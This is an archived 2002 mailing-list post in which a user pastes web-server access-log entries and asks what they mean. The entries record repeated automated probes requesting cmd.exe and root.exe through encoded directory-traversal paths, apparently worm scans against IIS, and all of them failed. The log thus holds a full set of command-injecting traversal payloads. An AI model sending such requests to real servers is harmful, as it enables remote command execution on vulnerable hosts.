access_log?

Subject: access_log?
From: Jon (champoux@mediaone.net)
Date: Tue Jan 22 2002 - 21:39:12 MST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: SFaulken: "Re: access_log?"
• Previous message: wtaggar: "Darwin-->Linux, Linux-->Darwin"
• Next in thread: SFaulken: "Re: access_log?"

I found something weird in my access log. I'm guessing someone here can
tell me what's going on?

Over and over again at different IP's...DOS?
===============
24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 276
24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 276
24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.159.4.118 - - [20/Jan/2002:13:48:36 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.159.4.118 - - [20/Jan/2002:13:48:46 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:11:50 -0500] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 276
24.128.57.12 - - [20/Jan/2002:14:11:53 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
24.128.57.12 - - [20/Jan/2002:14:11:57 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:14:12:00 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:14:12:04 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:12:07 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:14:12:10 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:14:12:13 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.128.57.12 - - [20/Jan/2002:14:12:17 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:12:20 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:12:24 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:12:27 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:12:31 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:14:12:34 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:14:12:38 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:12:41 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:28:01 -0500] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 276
24.128.57.12 - - [20/Jan/2002:14:28:05 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
24.128.57.12 - - [20/Jan/2002:14:28:09 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:14:28:13 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:14:28:16 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:28:20 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:14:28:24 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:14:28:28 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.128.57.12 - - [20/Jan/2002:14:28:31 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:28:35 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:28:39 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:28:42 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:28:45 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:14:28:49 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:14:28:53 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:28:56 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:36:23 -0500] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 276
24.128.57.12 - - [20/Jan/2002:14:36:27 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
24.128.57.12 - - [20/Jan/2002:14:36:31 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:14:36:35 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:14:36:38 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:36:42 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:14:36:45 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:14:36:49 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.128.57.12 - - [20/Jan/2002:14:36:52 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:36:59 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:37:03 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:37:06 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:14:37:10 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:14:37:13 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:14:37:17 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:14:37:21 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:15:20:04 -0500] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 276
24.128.57.12 - - [20/Jan/2002:15:20:07 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
24.128.57.12 - - [20/Jan/2002:15:20:11 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:17:03:25 -0500] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 276
24.128.57.12 - - [20/Jan/2002:17:03:28 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
24.128.57.12 - - [20/Jan/2002:17:03:32 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:17:03:35 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.57.12 - - [20/Jan/2002:17:03:39 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:17:03:42 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:17:03:45 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
24.128.57.12 - - [20/Jan/2002:17:03:49 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.128.57.12 - - [20/Jan/2002:17:03:52 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:17:03:56 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:17:03:59 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:17:04:03 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.57.12 - - [20/Jan/2002:17:04:06 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:17:04:09 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.57.12 - - [20/Jan/2002:17:04:12 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.57.12 - - [20/Jan/2002:17:04:16 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

• Next message: SFaulken: "Re: access_log?"
• Previous message: wtaggar: "Darwin-->Linux, Linux-->Darwin"
• Next in thread: SFaulken: "Re: access_log?"

This archive was generated by hypermail 2a24 : Tue Jan 22 2002 - 21:55:00 MST